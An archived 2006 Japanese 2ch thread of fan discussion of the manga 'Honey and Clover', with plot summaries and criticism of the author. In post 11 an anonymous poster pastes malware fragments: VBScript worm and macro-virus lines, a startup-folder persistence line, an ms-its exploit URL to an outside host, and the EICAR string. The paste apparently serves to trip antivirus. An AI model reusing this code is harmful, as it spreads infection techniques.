5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

羽海野チカ「ハチミツとクローバー」その56

1 :花と名無しさん:2006/09/03(日) 23:57:03 ID:???O
◆ コミックス第10巻…9月8日発売 ◆
◆ アニメ第2部…放送中 ◆
◆ 映画…一部上映中 ◆
※アニメ、映画の話題はそれぞれ専用のスレがあるのでそちらでどうぞ(>>2-3参照)※
★ このスレはsage進行です ※メール欄に半角で「 sage 」と記入。これ重要※
★ 荒らし・煽りは完全無視 ※反応するアナタも同罪です。これ常識※
★ 風紀もほどほどに ※話題の流れを変えたかったら自分から別の話題を投下する。これ鉄則※
≪前スレ≫
羽海野チカ「ハチミツとクローバー」その55
http://comic6.2ch.net/test/read.cgi/gcomic/1154710459/
★ 過去ログ保管庫
http://www.geocities.jp/hachikuro2ch/関連スレ,頻出質問事項等は>>2-20あたりに

2 :花と名無しさん:2006/09/03(日) 23:58:48 ID:???O
≪過去ログ≫
http://makimo.to:8000/cgi-bin/search/search.cgi?q=%89H%8AC%96%EC%83%60%83J&sf=2&andor=AND&H=&view=table&all=on
≪関連スレ≫
≪過去ログ≫
http://makimo.to:8000/cgi-bin/search/search.cgi?q=%89H%8AC%96%EC%83%60%83J&sf=2&andor=AND&H=&view=table&all=on
≪関連スレ≫
<<関連スレ>>
アニメ版
ハチミツとクローバー II chapter.5 【ハチクロ】
http://anime.2ch.net/test/read.cgi/anime/1156676761/
映画版
【櫻井翔】ハチミツとクローバー4冊目【蒼井優】
http://tv8.2ch.net/test/read.cgi/cinema/1155394779/

3 :花と名無しさん:2006/09/03(日) 23:59:39 ID:???O
≪公式サイト≫
ハチクロ連載中コミック誌「コーラス」
h ttp://chorus.shueisha.co.jp
作者(羽海野チカ)
h ttp://www13.plala.or.jp/umino
アニメ
h ttp://www.hachikuro.net
映画
h ttp://hachikuro.jp

≪頻出質問事項≫
Q.花本はぐみは、花本修司の姪ですよね?
A.違います。花本修司のいとこの娘です。※映画でのみ「姪」設定となっています

Q.登場キャラクターの身長の設定はどうなってますか?
A.[はぐ 145cm][山田 167cm][竹本 174cm][森田 179cm][真山 181〜182cm]

4 :花と名無しさん:2006/09/04(月) 00:00:35 ID:???O
羽海野チカインタビュー
ttp://books.yahoo.co.jp/interview/detail/07145617/01.html
・キューコミで初めはカットを描いてほしいって頼まれたのが
作者のアピールでマンガ連載って事になる。
・初めは竹本・真山・森田の三人の学生生活とか青春物を描く予定だった
・彼らの恋愛も描きたくなったので女子キャラ投入
・掲載誌を移ることになってクリスマスやら何やらのイベントをもう一回
やりたいからその為に一年分の時間を稼ぐ為に竹本を留年させた。
●真山のモデルはスガシカオの歌詞の主人公
ttp://www.s-woman.net/umino/1.shtml
「スガさんのつくった歌の中に、真山君みたいな子が出てくるときがときどきあるんです。多分、ご本人が自分のことを歌っているんだと
思うんですけども。ちょっと自分をどう扱っていいかわかんないみたいな
男の子が出てきて、マンガにしたら、今まで見たことない男の子に
なるんじゃないかなと」

5 :花と名無しさん:2006/09/04(月) 00:01:33 ID:???O
〜もうひとつの選択肢について〜
>以前、ロッキングオンJAPAN編集部にいたときに、
>僕は『ハチミツとクローバー』の作者の羽海野チカさんにインタヴューをしたことがあり、
>その時に印象的だった話がふたつあります。
(中略)
>そして、もうひとつはコミック第5巻のあるシーンについての話。
>花本先生が山田に「『努力する』か『諦める』か。人間に選べる道なんて
>たいていこのどっちかしかないよ」とアドバイスしたあと、
>心のなかで「ほんとうは、選択肢は3つあったんだ」とつぶやく―――
>彼がマンガの中では口にしない、
>そのもうひとつの選択肢とは「なにもしない」であり、
>花本先生もそれを選んだ人なのだと、羽海野さんは解説してくれました。

「 H 」VOL.86 2006年8月号(特集『ハチミツとクローバー』)より 編集後記(抄) 
ttp://www.amazon.co.jp/gp/product/B000GYI606/sr=1-7/qid=1155475428/ref=sr_1_7/250-3292008-0485862?ie=UTF8&s=books

6 :花と名無しさん:2006/09/04(月) 00:03:12 ID:???O
少し早いですが立てました
以前テンプレにあった 最終回あらすじなど今までの展開は コミックが出るんだから今回は削除しました

7 :花と名無しさん:2006/09/04(月) 00:05:00 ID:???O
秋頃に コーラスにハチミツとクローバースピンオフが掲載される予定です
まぁ 特別編みたいなもんです 多分

8 :名無しのストーカー真山:2006/09/04(月) 00:09:50 ID:???O
●● 真山のテンプレ ●●
・初期はコンパでは女の子お持ち帰り。しかしその後のオマケ話でそれは山田の勘違いとゆう後付け設定。このオマケ漫画により実は山田が全て原因とゆう結末になる
・花本先生の携帯履歴を勝手に見てその後なにもなかったように本人と会話
・無理してカッコつける大人ぶる『大人さいこ〜』
・野宮の山田への接触を邪魔をする、山田をふっておきながらさらに恋を迷わせる
・次にリカを見掛けたら『襲いかかるかもしれません』発言
・無理矢理寝ていたリカの唇を奪う
・無理矢理 リカの仕事場に押し掛け勝手に入り仕事場を獲得する。そして勝手にコーヒー入れる
・リカのバスタオルに顔をうずめたり、浴槽のフチを『ああ、ここでリカさんが』とかいってなでまわしたりしてる by予想者・美和子(予想的中)
・山田とリカの接触を嫌がる 山田の仕事奪う もみ消しを図る
・リカのパソコンの履歴を勝手に見る
・リカ宛てのメール、FAX、郵便、書類を見て 全てリカの事は知ってる!!!
・『俺に関わったのが間違いだったな、どこまでもつきまとってやる!』と言う
・リカのいない時、また勝手にパソコンを開きメールを勝手に見る。
・『おとうさんは〜』『とうさんが悪かった!!』 自分をやたらおとうさんと呼ぶ←意味不明
・盗難防止用ベルを持ち歩き リカのカバンにこっそりつける
・カギがかかったリカが寝ている部屋に笑いながら道具を使い 開けようとする
・最後までリカと修の関係を疑う男でした

9 :花と名無しさん:2006/09/04(月) 00:26:36 ID:???O
一応 最終回の皆さんの道。恋の結末

竹本→進むべき道がわかり、就職も決まる はぐには片思いで終わった様子だが後悔はしていない。よかったと

はぐ→絵をかいていきたいからリハビリは修と続けることを選ぶ。森田はなんか気になるらしい

山田→真山は振り切れてないが野宮と一緒に手をつないでゆっくりとこれから・・・らしい

森田→やっぱり楽しいと思えた映画の監督らと一緒に仕事をする。やはりはぐは気になるらしい

真山→リカと相変わらず

修→はぐとリハビリ生活を頑張る。 はぐが森田を気にしているのを暖かく見ている感じからして結局は、見守る存在ぽい

10 :Saga:2006/09/04(月) 02:47:10 ID:???O
ハチクロ連載終わったの?

11 :<body onload=window()>:2006/09/04(月) 05:40:27 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

12 :花と名無しさん:2006/09/04(月) 08:25:10 ID:???0
乙です。
前スレは「私は元オリーブ少女でハイセンスなの。
そんな私が選んだハチクロはハイセンスで一般の先を行ってるの」と言いたい
40代主婦の擁護が痛かったねえ

13 :花と名無しさん:2006/09/04(月) 17:42:55 ID:???O
最近読みだしたのでよくわかんないのだけど10巻で完結?
それとも続編みたいな違うタイトルのコミックが出るの?

14 :花と名無しさん:2006/09/04(月) 18:07:29 ID:???0
この人のギャグとキャラ好きだったのに
途中からやりすぎでウザくなった。特にギャグ

15 :花と名無しさん:2006/09/04(月) 19:25:31 ID:???0
かぼミントとグレープフルーツご飯は食べれそう。

16 :花と名無しさん:2006/09/04(月) 20:04:15 ID:wDp5tWyxO
そろそろアンチスレ池よw
頭おかしいのはおまえ等だぞ 前スレの作者どうの書いてる連中
普通 どうでもいいし

17 :花と名無しさん:2006/09/04(月) 20:15:21 ID:???0
●● 竹本の不幸  ●●
・小学生の頃父が他界。高校で母が再婚するが、自分の進む道がわからなくなる。
 この頃からすでに彼の自分探しは始まっていた。探さない方がいいのに。
・浜美入学早々森田に中学生みたいな髪型にされ一年間振り回される。
・天才はぐに一目惚れし、己の平凡さを嘆き将来に不安を覚える。ここから真の不幸が始まる。
・今日なんで集まったんだっけ?「ぼくの誕生日ですよ」しかもツイスターゲーム。
・はぐの部屋に泊まる事になるが、夜中にベルサイユのキッチンセットを作ってと言い残しはぐ就寝。
 ただの奴隷扱いだがこれはまだ幸せだったかもしれない。むしろ絶頂期。
・森田がはぐを好きだと気付き、勝ち目が無いと悟りぼんやりする。
・夜、電話一本でクリスマスなのにバルーンアートを徹夜で作る手伝いにかりだされる。不眠でバイトへ。
・「はぐは森田となかよしだったりするのかい?」「先生…ぼくに聞かないでください」
・就職に失敗し続け学園祭用の謎の塔を一心不乱に作り続ける。この頃から鬱病気味に。
・錯乱した山田のかかと落としが直撃。
・「いるべき人が いなくって いなくても どってことない人間が ここでケーキを口に運んでいる」
 クリスマスケーキを食べながら超ネガティブ思考。そしてまたツイスターゲーム。
・卒業制作の作業中に吐血>入院>浪人。
・内定が決まった日に、就職先がどうやら倒産しそうだという報せが就職祝い中に届く。
・幻聴が聴こえてくる。気付いたら自転車で海へ。ここは精神崩壊の瀬戸際だったがなんとか持ちこたえた。
・ママチャリであてもなく日本列島を北上。痔になる。
・旅先で住み込みバイト中に、年下の元ヤンから「おまえ」「ばかじゃねーの」等の罵声を浴びる。
・一皮むけて旅から帰ってきてフラれる。

●● 竹本の人格崩壊後 ●●●●●●●●

・花も買えない情けない男
・森田をねたんで、森田にはぐみを取られるくらいなら修に取られる
 ほうがマシだと、修にはぐみに愛の告白をするようたきつける
・兄貴と関係で不幸のズンドコの森田に対して、人間として
 言ってはいけないことを言う

18 :花と名無しさん:2006/09/04(月) 20:16:01 ID:???0
●●10巻のあらすじ●●

治さなくていい、いてくれるだけでいいと精一杯告白する森田に
描けなくなったら私は死んじゃうと、病院に戻るはぐ。
病院から外へ連れ出した森田を殴る修。

はぐ、修の手を握りながら
「あのねお願いがあるの 修ちゃんの人生を私に下さい 
ごめんね 返せるかもわかんないのに こんな事言って でも
でも・・・私描きたいのずっと だから 一緒にいて 最後の最後まで」
「いいよ・・・返さなくていいよ 全部やるよ」と返事する修。ラブラブムード。
はぐのモノローグ
『修ちゃんは私の雨だ。一緒にいると深く息ができて草や木みたいに
 ぐんぐん伸びてゆけそうな気がする。 私のだいじな だいじな ひと』

別の場面で、森田と竹本は殴りあい。人格崩壊後の竹本は、森田をねたんで
金と才能だけの人間でしかない森田にはぐを取られるくらいなら
修に取られたほうがマシだったと言う。森田の頭の中に「才能才能才能」の言葉が響く。

森田は修に現金が大量に入った段ボールを
「これでアイツ(はぐみ)を治してやってくれ」と修に贈りつけるが
修はそのうち札束3つ(約300万)をゲットして、それ以外は森田に投げつけて返し
「金は返すがはぐは返さん! ハハハハ (はぐのことは)好きさ!大好きさ!」
と真っ赤になりながら叫ぶ。 そして森田は去ってゆく。

そんな修にキャーキャーいいながら驚く山田。
野宮は、リーダー(犬)を比喩に出して、山田に臭とはぐと森田の関係を納得させる。
リカと修は抱擁の末、別れた。
真山は、修がはぐみを好きなことを大歓迎の様子で、大喜びする。

19 :花と名無しさん:2006/09/04(月) 20:16:35 ID:???0
引越しの準備でボロアパート部屋を片付ける竹本。
その後、送別会を開く。(森田はいない)
真山が「最後だから竹本はウチに泊まらせますよ」の言葉に反応して
みんな泣きそうになる。
思わず修がはぐにおつかいを頼み、付き添いで竹本も外出。
竹本のチャリの後ろにはぐが座る。怪我はかなり回復している様子。
はぐが竹本の卒制作品について語る。
「竹本君はどこにも手を抜かない人だから、竹本君に作ってもらったお寺は幸せだね」等。
「今まで修ちゃんに沢山のものを貰ったから、返さないといけない」とも言う。
それに対して竹本「はぐちゃんはそんなこと考えなくていいよ。先生は自分で見つけられる人だから」
はぐ「…ありがとう。」

美和子さん山崎が仲直りをセッティングしてくれる。(前回野宮が山田をいじめた件で)
野宮と山田が落ち合う。前回のことで気まずい2人。
山田が「もう会わない方がいいのかもしれない」と言うと、野宮は納得して去ろうとするが
泣いてしまう山田に振り返って「真山のことはずっと引きずっているけど、でも一緒にいよう」
というような事を話す。手を繋がれたまま山田号泣。


20 :花と名無しさん:2006/09/04(月) 20:17:13 ID:???0
森田と馨が2人布団を並べて会話をしている。
はぐのことを聞かれ「あいつは強い女だよ」など少し語る。
ピーターの所に行く決心も語る。
「会社が停電したらピーターも他の社員も、みんなビームサーベルもって部屋から出てくるんだぜ!?
こんな大人達、父さん以外見たことない」
会話の最中にぼんやりと光りが出てくる。「父さんが言ってたことが分かったような気がする」

竹本のモノローグに移る。
報われない片思いは意味があるのか云々語り、「はぐちゃん、君を好きになって良かったよ」という結論に達する。
モノローグの間に場面が展開して、駅のホームで竹本がはぐから包みを渡される。
席に着いて開けてみると、パンが何段も重なったサンドイッチが入っていた。
パンをめくって中身を見てみると、ハチミツが縫ってある。真ん中には四葉のクローバーが。
昔みんなでクローバーを探した記憶が蘇る。「あの時全然見つからなかったのに…」
更にめくると、全段にハチミツと四葉のクローバーが入っていた。
電車の中で竹本号泣。
モノローグで少し語って終了。

●●10巻のあらすじ おわり●●


21 :花と名無しさん:2006/09/04(月) 20:18:25 ID:???0
ハチクロ後半を良しとしていないだけで、別にアンチじゃない。
本当に嫌いだったら、スレに書き込みもしないで無視してるよ。
このスレで本当のアンチって少ないと思う。

確かに、はぐみや“臭になった修”や真山は決して好きなキャラではないし
羽海野さんの人間性にも大いに疑問があるけどね。

ついでにハチクロの現状や作者を
良しと思う人の思考にも疑問を感じる。
無論、理解できないと言う意味であって
批判しているわけではないので怒らないように。

ハチクロの絵は好きだし。好きなキャラクターもいる。
この2点だけでも読む理由になるもんだ。
あと、世の中文句言いながら読むのはそれほど珍しい事でもない。
無視されるよりは、存在感を示せてるわけだし。


22 :花と名無しさん:2006/09/04(月) 20:19:25 ID:???O
>>16
なんか湧いてるwww
作者あっての作品だよwww

男(キモヲタ?)の女叩きは気持ち悪いぞ〜
前スレ995みたいに男主張したがる奴って何なんだ?

23 :花と名無しさん:2006/09/04(月) 20:23:57 ID:???0
>>22
いつもの携帯厨なのでスルー推奨。
漫画の女キャラが好きでリアル女が嫌いなんですよ。こういう人種は。

24 :花と名無しさん:2006/09/04(月) 20:32:18 ID:???0
終盤になるにつれどんどん客観性を欠いた作品になっていってしまったのが残念。
初期の頃と「作風」が変わってしまう…ってのは、長期連載ではある程度仕方のない事だけど、
作品世界の在り方自体が変貌してしまうのはイカンよ。

作者の脳内電波放出(読者の理解は二の次。ていうか「理解してもらえなくていい」)した後、
あわてて他のキャラに状況解説をさせることで第三者の視点を無理やりねじ込む…
こんな構図に成り下がっていってしまってはいなかっただろうか。

初期の頃から、(いい意味で)お説教臭くて、
リアルとファンタジーが入り混じった作品世界だと思ってはいたけど、
こういうタイプの作品は
作品世界の在り方の客観性が維持できなくなると、
途端に「押し付けがましく、かつ、説得力が無い」という、
「最悪」の一歩手前くらいの作品へと変貌する。

実に残念でした。
だがスピンオフには一応期待しておく。
読みきりならいいもの描いてくれそうだし。

25 :花と名無しさん:2006/09/04(月) 20:36:36 ID:???0
前スレより

965 :花と名無しさん :2006/09/04(月) 01:11:30 ID:???0
    ダビンチ8月号より作者インタブー
    [1] h ttp://vipper.jpn.org/www/upload/src/VIPphoto11565.jpg
    [2] h ttp://vipper.jpn.org/www/upload/src/VIPphoto11566.jpg
    [3] h ttp://vipper.jpn.org/www/upload/src/VIPphoto11567.jpg
    [4] h ttp://vipper.jpn.org/www/upload/src/VIPphoto11568.jpg  
 

    良くも悪くもセンシティブな作家と言えよう・・・


26 :花と名無しさん:2006/09/04(月) 20:47:42 ID:???O
>>22-23
なに言ってんだ?
やっば頭おかしいよ
ちょっと精神科行ってこい!
いつ誰が漫画の女キャラクターが好きとか言った
普通に人を中傷するの よくないと思うが・・・みたいな事を言っただけだが?

27 :花と名無しさん:2006/09/04(月) 20:49:27 ID:wDp5tWyxO
おまえら あれだぞ
以前、口が臭かったの書いてたやつと同レベルだぞ!!

28 :花と名無しさん:2006/09/04(月) 21:31:37 ID:???O
最近この漫画に興味もって買い始めたんだが、
前スレをネタバレに気をつけながら読んでみるとウホッネタに走っていくのか?
今2巻まで買ったけどこのまま買っていいものか迷うな…

29 :花と名無しさん:2006/09/04(月) 21:46:04 ID:???0
ウホッをかすかに匂わせるシーンならあるけど気にするほどじゃないよ

30 :花と名無しさん:2006/09/04(月) 22:00:34 ID:???0
森田って才能が逆コンプレックスだったんだね。
竹本の「金と才能だけ発言は」カオルの「金儲けの才能しかない」発言と同じで
金と才能だけしかないと言って実は安心したがってる凡人の側にいたいがために
今までずうっと、真面目に作品作らずおちゃらけてたんだ。

31 :花と名無しさん:2006/09/04(月) 22:07:08 ID:???0
>>28
ウホネタはなかったよ。

でも、羽海野さんと同じ属性の人(=ホモ妄想が大好きな人)なら
森田兄弟とかでウホ妄想ができるのかもしれない。

32 :花と名無しさん:2006/09/04(月) 22:29:06 ID:???0
男のブログ見てたんだがはぐには森田より竹本、修派が多いんだな
まぁはぐより山田が人気なんだけど

33 :花と名無しさん:2006/09/04(月) 22:31:37 ID:???0
>>30 だね。
ウミノのキャラ造形は筋が通ってはいるんだけど
トラウマ心理学によりすぎてて、エヴァ的にウジウジしてる

34 :花と名無しさん:2006/09/04(月) 22:32:36 ID:???0
>>32
世の中には凡人の方が多いもんね

35 :花と名無しさん:2006/09/04(月) 22:33:24 ID:???O
>>29 >>31
サンクス。
2chでいつもウホネタで笑ってたけどいざ現実となるとまわりからドン引きされそうで怖いw
1、2巻ともあの雰囲気が気に入ったのでこのまま買うことにするよ。

36 :花と名無しさん:2006/09/04(月) 22:35:21 ID:???0
男のハチクロファンのブログや感想サイトをいくつも読んだけど

「『竹本=主人公』として捉えていて、主人公である竹本に感情移入している」
「女キャラでは山田に萌えている。はぐやリカにはあまり興味がない」
「森田は、よくわからない。森田とはぐみが一緒になるところは想像できない」
「野宮は、なんかむかつく。野宮に山田さんの処女を奪われるのは許せない」
「ハチクロのギャグ部分が好き」

みたいな人が多かった。

女のハチクロファンからは森田や野宮は人気あるから
恋愛漫画(少女漫画、男向け萌え漫画)好きの女と男では
視点が違っていて面白かった。

37 :花と名無しさん:2006/09/04(月) 22:42:16 ID:???0
というか山田萌えの男ハチクロファンなんて
アニメから入ったオタクしかいなそう。

38 :花と名無しさん:2006/09/04(月) 22:43:27 ID:???O
>>36
> 「『竹本=主人公』として捉えていて、主人公である竹本に感情移入している」
ノ 感情移入は出来なかったが…

> 「女キャラでは山田に萌えている。はぐやリカにはあまり興味がない」
ノ 鉄人様が1番だがはぐもリカも好きだ。

> 「ハチクロのギャグ部分が好き」



女って観察力(分析力?)すげーな。

39 :花と名無しさん:2006/09/04(月) 22:46:44 ID:???0
携帯からわざわざすげーな

40 :花と名無しさん:2006/09/04(月) 22:58:16 ID:???O
>>39
打つのは遅いが慣れるもんよ。

…すまん。負荷がかなりかかるんだっけ?
家族にバレそうだからってずっと避けてきたけどとうとう専ブラ使う日が俺にも来るのか…

41 :花と名無しさん:2006/09/04(月) 23:00:02 ID:???0
>>37
ブログやサイトで漫画の感想を書いてる人は、全員がオタクだよ。
2ちゃんで漫画の感想を書き込んでる人もオタクだよ。

「オタク=キモオタ、宮崎勤や小林薫みたいなタイプ」
というわけじゃないんだし、オタクでも別にかまわんよ。
自分は、オタクをバカにするような人種のほうが嫌いだよ。

42 :花と名無しさん:2006/09/04(月) 23:03:23 ID:???0
凡人だから竹本、っていうよりはモノローグ量の多寡による登場人物の理解しやすさの気がしなくもない。
終盤までは竹本山田>真山>修野宮>はぐ森田って感じだったし。
まあ、真山とかの場合、もっと語られたら変態度上がって共感下がりそうだがw

43 :花と名無しさん:2006/09/04(月) 23:07:18 ID:???O
>>26
きんもー★
とっとと回線切れよ

44 :花と名無しさん:2006/09/04(月) 23:21:16 ID:???O
>>41
そのオタクが女を腐とか妬みとか馬鹿にしてるんだから仕方ないぞ

45 :花と名無しさん:2006/09/04(月) 23:22:52 ID:???0
こんなして話題にのぼるのは今年のうちだけかな

46 :花と名無しさん:2006/09/04(月) 23:25:44 ID:???0
>>44
それは「オタクの同族嫌悪」だね。

47 :花と名無しさん:2006/09/04(月) 23:27:08 ID:???0
>>41
正当化すんなよ。恥ずかしいな。

48 :花と名無しさん:2006/09/04(月) 23:28:03 ID:???0
携帯厨はネナベの竹本オタなんだよな

49 :花と名無しさん:2006/09/04(月) 23:32:35 ID:???0
前スレテンプレより↓

12 :花と名無しさん :2006/08/17(木) 04:03:33 ID:???0
    YUKIのFC会報に対談あり。
    コーラス7月号発売直後だったらしく、連載後半のシリアス部分についても語ってる。

    ・森田派や竹派から困惑の電話殺到。
    「署名集めたら結末は変わるのか?」との質問も。

    ・ハチクロは修の物語でもある。
    「傍観者」だと思おうとしていたが、みんなと同じになって飛び込む事で、
    大好きだー、と言える様になった。

    ・はぐの話は最初から決まってた。
    すごくつらい話になるから、読者もつらくなるだろうと思い、ものすごい勢いで飛ばして描いた。

    ・はぐの話を進める上で森田の生い立ちは避けて通れず、どうしようもなくすれ違う二人を描きたかった。

    ・はぐの様に道を決めた子は読者から共感されにくいが、
    モノを作ってる人には分かってもらえるといいなと思って描いていた。

    ・YUKIと平野(アニメのOPのディレクター)「辛い時に傍にいる人に頼ってしまうのは共感できる」との話を聞いて、
    海羽野「次号(多分ラスト)描くべき事が分かった」と。


50 :花と名無しさん:2006/09/04(月) 23:36:41 ID:???O
>>48
じゃあお前は何なんだ?

そういう煽りするから森田ヲタとか竹本ヲタとか
罵り合戦になるんだよ

51 :花と名無しさん:2006/09/04(月) 23:42:02 ID:???0
まあおちつけや

52 :花と名無しさん:2006/09/04(月) 23:48:37 ID:???O
>>49
本当にはぐに激しく肩入れしてんだ。
なんか実ははぐ物語を描きたかったのかなと思うよそれから受ける印象は…。

53 :花と名無しさん:2006/09/04(月) 23:56:56 ID:???0
作者、喋りすぎ。

解説や説明するなよ……
ものつくりしてる人ならさ

54 :花と名無しさん:2006/09/04(月) 23:59:19 ID:???O
売れてちやほやされて舞い上がって
ついテンションが上がったんだよ

55 :花と名無しさん:2006/09/05(火) 00:05:39 ID:???0
>>54
いや、テンションは一貫してるよ。
どちらかと言えば「ハチクロを描いていそうな作者」
ってキャラを作リ込んでるぐらいだと思う。

20ぐらい歳が若ければしっくり来ると思うんだけど、
歳まで詳しく知らない読者は納得する出来だと思う。

56 :花と名無しさん:2006/09/05(火) 00:06:47 ID:???0
どうしてハチクロスレには毎回ノートン先生が誤作動起こして
スレを見れなくするコピペがされてんの。
スレ的に女だと思うが女がこんなことしてたらキモいよ。

57 :花と名無しさん:2006/09/05(火) 00:13:46 ID:???O
ここ最近のスレ流れが気に入らない狂儲か
出版社の工作員かな?

58 :花と名無しさん:2006/09/05(火) 00:15:09 ID:???0
他のスレもやられてるよ

59 :花と名無しさん:2006/09/05(火) 00:17:41 ID:???O
PCの前で新スレが立つのをチェックして
コピペする様子を想像したら泣けた

60 :花と名無しさん:2006/09/05(火) 00:18:53 ID:ofF3mwoUO
男女関係ないだろ

61 :花と名無しさん:2006/09/05(火) 00:29:04 ID:???0
よく知らんがスクリプトとかで自動でやってるんじゃないの?

62 :花と名無しさん:2006/09/05(火) 00:33:01 ID:???0
知らないならテキトーなこと言っちゃいかん

63 :花と名無しさん:2006/09/05(火) 00:33:37 ID:???0
>>49
なんか・・・いろいろビミョーなコメントだね

64 :花と名無しさん:2006/09/05(火) 00:41:06 ID:???0
これで修ちゃんが事故死し森田か竹本とくっつくフラグが(ry

と懐かしいはぐとくっつくヤシは死亡する予想を立ててみる

65 :花と名無しさん:2006/09/05(火) 00:56:48 ID:???0
>>49
・はぐの様に道を決めた子は読者から共感されにくいが、
モノを作ってる人には分かってもらえるといいなと思って描いていた。

なんか、9巻の達夫さんのモノローグ思い出した。
持つ者と持たざる者。

66 :花と名無しさん:2006/09/05(火) 01:44:47 ID:???0
つまり、「持つ者」にのみ理解してもらえればよくて、
いわゆる一般的な読者=持たざる者 は理解できなくても良い、と。

ホント喋りすぎなんだよ。
描くなとは言わないけど、もう喋るな。
10年経ってから「当時の思い出」レベルで喋るならともかく。
作品が可愛くてしょうがないのはわかるが、
雑誌が出て公開された時点で自分の手を離れた、くらい考えろ。
仮にもプロなんだから。

67 :花と名無しさん:2006/09/05(火) 01:58:46 ID:???0
おいおいおい
読者には「理解されにくいけど」ってなに?????

68 :花と名無しさん:2006/09/05(火) 02:01:26 ID:???0
理解できない読者がバカだと思ってるんだろう。

69 :花と名無しさん:2006/09/05(火) 02:08:35 ID:???0
「同人気分」が抜けないんだよ、この人は。
女向け同人の世界だと
読者が作者に誉め言葉以外の感想の手紙を出したり
作者の描きたいことにそぐわない要望を書くこと自体がタブーで
同人の世界でならそういう読者は厨でDQNな読者扱い。

また、同人の世界なら
「私の漫画を嫌いな人は最初から読まないでください」
「私の漫画を理解できる人だけに読んでほしいです」
と作者が読者を線引きしてもOK。

そんな同人の頃の感覚を羽海野さんは
ヤングユーやコーラスに行っても持ちつづけてる。


70 :花と名無しさん:2006/09/05(火) 02:16:16 ID:???O
>>49
はぐが共感されにくいって決めてかかってどうすんのさ…

はぐを特別な存在にしたいのかい?

71 :花と名無しさん:2006/09/05(火) 02:24:31 ID:???0
モノを作る人をなんだと思っているのかな……


    ・はぐの様に道を決めた子は読者から共感されにくいが、
    モノを作ってる人には分かってもらえるといいなと思って描いていた。


道を決めるって、読者は道も決めたことがない人ばっかりってこと?

    ・YUKIと平野(アニメのOPのディレクター)「辛い時に傍にいる人に頼ってしまうのは共感できる」との話を聞いて、
    海羽野「次号(多分ラスト)描くべき事が分かった」と。

そんなのだれだってそうだろう。
YUKIがいえば違うのか?


72 :花と名無しさん:2006/09/05(火) 02:28:58 ID:???0
道を決めた子だから共感できないんじゃなくて
描かれ方に共感できないのに


73 :花と名無しさん:2006/09/05(火) 02:29:24 ID:???0
なんかすごく調子いい感じをうける
ウマーな人にはゴマするような媚るような

74 :花と名無しさん:2006/09/05(火) 02:56:45 ID:???0
一般人の言うことはゴミ扱いするけど
芸能人、ミュージシャン、アニメ業界の人、マスコミ人の言うことには
シッポ振るタイプなんだろ。

プロ漫画家デビューしていない同人時代の友達も
プロ漫画家デビューできたウミノ的には
ゴミだから切り捨てたんだろ。
同人時代は人間関係で苦労してばかりでいつも泣いてばかりいた…と
世間にアピールして。

しかしアピールしたつもりが大半の人はドン引きだろうが…。

75 :花と名無しさん:2006/09/05(火) 03:02:05 ID:???O
>>71
スピッツの主題歌に影響受けてラスト変えた人ですから

76 :花と名無しさん:2006/09/05(火) 03:25:44 ID:???0
恋より芸術を取るはぐと、兄の復讐に手を貸す森田は
結ばれないですれ違う…というストーリーが
ウミノさんの頭の中に最初からあったけど
スピッツの歌を聴いて、
森田ははぐのことを想いながら映画界で頑張り
はぐはネットで森田のページを見てうっとりしてるような
最終回に変えたってことか。

もしスピッツの歌に影響を受けなかったら
結ばれないですれ違うどころか
森田あぼーんとかしてたかもな。
「終わりの始まりの幕」だし。

77 :花と名無しさん:2006/09/05(火) 03:31:54 ID:???0
影響を受けたって
「最初から最後は決まっていた」ってうそなの?

78 :花と名無しさん:2006/09/05(火) 04:01:57 ID:???0
物語を作り上げる能力が無い

79 :花と名無しさん:2006/09/05(火) 05:06:56 ID:???0
いろいろ語っちゃうから皆から言われるんじゃん
黙ってれば良いのにさ

80 :花と名無しさん:2006/09/05(火) 05:20:27 ID:sCwd2CwpO
あら?
修とはぐって社会的にセックルできる立場だっけ?


81 :花と名無しさん:2006/09/05(火) 05:35:32 ID:???O
今日のテレホンショッキングはスガシカオ。
羽海野は花贈るのかな。

82 :花と名無しさん:2006/09/05(火) 07:22:52 ID:???0
>>80
臭から見てはぐは「いとこの娘」だから、セックルや結婚はオケ。
いとこ同士は結婚が日本の法律では違反じゃない。
いとこの娘となると、いとこよりももっと親等が遠くなる。

83 :花と名無しさん:2006/09/05(火) 07:57:43 ID:???0
mixiのことはmixiに書けやぁぁぁ!

mixiやってますよ、探してね☆ってアピなのか?
理解に苦しむ。

84 :花と名無しさん:2006/09/05(火) 08:11:41 ID:???0
>>83
何のことかと思ったら、羽海野さんの9月5日分の
www2.diary.ne.jp/logdisp.cgi?user=162279&log=20060905
の日記か…。

作者、mixi見てるんだね。
こりゃあmixiではマンセー感想しか書けないわけだ。

85 :花と名無しさん:2006/09/05(火) 08:51:32 ID:???0
キャラそれぞれの人生は最初かから決まっていたと言ってたけど、
実際は連載するうちに変わったんだろうな。

他のキャラはまだ理解出来るんだけど、
臭だけはがっかり。
たがが外れたダメ中年としか思えん。

86 :花と名無しさん:2006/09/05(火) 08:59:07 ID:???0
作者がはぐに自己投影しちゃって
「ものをつくるものの性はわかってもらえないよね、はあ・・・☆」って閉じて酔ってるのが気持ち悪いの
そこでハチクロのすべてが駄になったよ。
